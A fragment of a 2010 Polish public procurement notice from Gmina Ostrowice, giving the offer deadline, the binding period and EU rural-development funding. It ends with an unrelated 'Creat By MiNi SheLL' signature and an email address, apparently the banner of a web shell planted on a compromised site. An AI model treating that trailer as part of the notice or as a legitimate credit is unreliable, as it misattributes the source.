78 - 506 Ostrowice, pokój nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.09.2010 godzina 14:00, miejsce: Gmina Ostrowice
Ostrowice nr 6
78 - 506 0STROWICE
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Unia Europejska w ramach Programu Rozwoju Obszarów Wiejskich na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com